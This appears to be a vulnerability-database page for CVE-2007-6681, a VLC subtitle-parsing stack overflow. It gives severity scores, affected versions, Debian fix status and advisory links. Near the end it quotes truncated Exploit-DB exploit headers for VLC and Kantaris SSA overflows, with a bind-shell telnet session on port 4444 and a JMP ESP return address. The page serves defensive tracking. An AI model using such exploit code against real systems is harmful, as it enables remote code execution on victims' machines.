CVE-2007-6681
published 2008-01-17CVE-2007-6681: Stack-based buffer overflow in modules/demux/subtitle.c in VideoLAN VLC 0.8.6d allows remote attackers to execute arbitrary code via a long subtitle in a (1)…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
17.36%
96.7th percentile
Stack-based buffer overflow in modules/demux/subtitle.c in VideoLAN VLC 0.8.6d allows remote attackers to execute arbitrary code via a long subtitle in a (1) MicroDvd, (2) SSA, and (3) Vplayer file.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6.c-4.1 (bookworm) | vlc 0.8.6.c-4.1 (bookworm) |
| debian | vlc | < vlc 0.8.6.e-2.1 (bookworm) | vlc 0.8.6.e-2.1 (bookworm) |
| videolan | vlc | <= 0.8.6d | — |
| videolan | vlc | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.c-4.1 | 0.8.6.c-4.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.c-4.1 | 0.8.6.c-4.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.c-4.1 | 0.8.6.c-4.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.c-4.1 | 0.8.6.c-4.1 |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rpgr-7f6v-4qmq: Stack-based buffer overflow in modules/demux/subtitle
ghsa_unreviewed·2022-05-01
CVE-2007-6681 [HIGH] CWE-119 GHSA-rpgr-7f6v-4qmq: Stack-based buffer overflow in modules/demux/subtitle
Stack-based buffer overflow in modules/demux/subtitle.c in VideoLAN VLC 0.8.6d allows remote attackers to execute arbitrary code via a long subtitle in a (1) MicroDvd, (2) SSA, and (3) Vplayer file.
GHSA
GHSA-7fxm-mjcc-cj9m: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-1881 [HIGH] CWE-119 GHSA-7fxm-mjcc-cj9m: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
OSV
CVE-2008-1881: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
osv·2008-04-17·CVSS 7.5
CVE-2008-1881 [HIGH] CVE-2008-1881: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
OSV
CVE-2007-6681: Stack-based buffer overflow in modules/demux/subtitle
osv·2008-01-17·CVSS 7.5
CVE-2007-6681 [HIGH] CVE-2007-6681: Stack-based buffer overflow in modules/demux/subtitle
Stack-based buffer overflow in modules/demux/subtitle.c in VideoLAN VLC 0.8.6d allows remote attackers to execute arbitrary code via a long subtitle in a (1) MicroDvd, (2) SSA, and (3) Vplayer file.
Debian
CVE-2008-1881: vlc - Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) ...
vendor_debian·2008·CVSS 7.5
CVE-2008-1881 [HIGH] CVE-2008-1881: vlc - Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) ...
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
Scope: local
bookworm: resolved (fixed in 0.8.6.e-2.1)
bullseye: resolved (fixed in 0.8.6.e-2.1)
forky: resolved (fixed in 0.8.6.e-2.1)
sid: resolved (fixed in 0.8.6.e-2.1)
trixie: resolved (fixed in 0.8.6.e-2.1)
Debian
CVE-2007-6681: vlc - Stack-based buffer overflow in modules/demux/subtitle.c in VideoLAN VLC 0.8.6d a...
vendor_debian·2007·CVSS 7.5
CVE-2007-6681 [HIGH] CVE-2007-6681: vlc - Stack-based buffer overflow in modules/demux/subtitle.c in VideoLAN VLC 0.8.6d a...
Stack-based buffer overflow in modules/demux/subtitle.c in VideoLAN VLC 0.8.6d allows remote attackers to execute arbitrary code via a long subtitle in a (1) MicroDvd, (2) SSA, and (3) Vplayer file.
Scope: local
bookworm: resolved (fixed in 0.8.6.c-4.1)
bullseye: resolved (fixed in 0.8.6.c-4.1)
forky: resolved (fixed in 0.8.6.c-4.1)
sid: resolved (fixed in 0.8.6.c-4.1)
trixie: resolved (fixed in 0.8.6.c-4.1)
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
exploitdb·2008-04-25
CVE-2008-1769 Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
---
#!/usr/bin/python
#
# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
#
# The following exploit will make a film.ssa file,
# just rename the file with the name of your movie, and use your imagination
# to pwn! :)
# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
#
# BIG thanks to muts for helping
# and discovering a very interesting thing that we will publish soon
#
# I piss on your Business Networks course Igor Radusinovic! Go to hell!
#
# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu
import os
jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 E
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/vlcboffs-adv.txthttp://mailman.videolan.org/pipermail/vlc-devel/2007-June/032672.htmlhttp://mailman.videolan.org/pipermail/vlc-devel/2007-June/033394.htmlhttp://osvdb.org/42207http://secunia.com/advisories/28233http://secunia.com/advisories/29284http://secunia.com/advisories/29766http://secunia.com/advisories/29800http://security.gentoo.org/glsa/glsa-200804-25.xmlhttp://securityreason.com/securityalert/3550http://wiki.videolan.org/Changelog/0.8.6fhttp://www.debian.org/security/2008/dsa-1543http://www.gentoo.org/security/en/glsa/glsa-200803-13.xmlhttp://www.securityfocus.com/archive/1/485488/30/0/threadedhttp://www.securityfocus.com/bid/27015http://www.videolan.org/security/sa0801.phphttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14334https://www.exploit-db.com/exploits/5667http://aluigi.altervista.org/adv/vlcboffs-adv.txthttp://mailman.videolan.org/pipermail/vlc-devel/2007-June/032672.htmlhttp://mailman.videolan.org/pipermail/vlc-devel/2007-June/033394.htmlhttp://osvdb.org/42207http://secunia.com/advisories/28233http://secunia.com/advisories/29284http://secunia.com/advisories/29766http://secunia.com/advisories/29800http://security.gentoo.org/glsa/glsa-200804-25.xmlhttp://securityreason.com/securityalert/3550http://wiki.videolan.org/Changelog/0.8.6fhttp://www.debian.org/security/2008/dsa-1543http://www.gentoo.org/security/en/glsa/glsa-200803-13.xmlhttp://www.securityfocus.com/archive/1/485488/30/0/threadedhttp://www.securityfocus.com/bid/27015http://www.videolan.org/security/sa0801.phphttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14334https://www.exploit-db.com/exploits/5667
2008-01-17
Published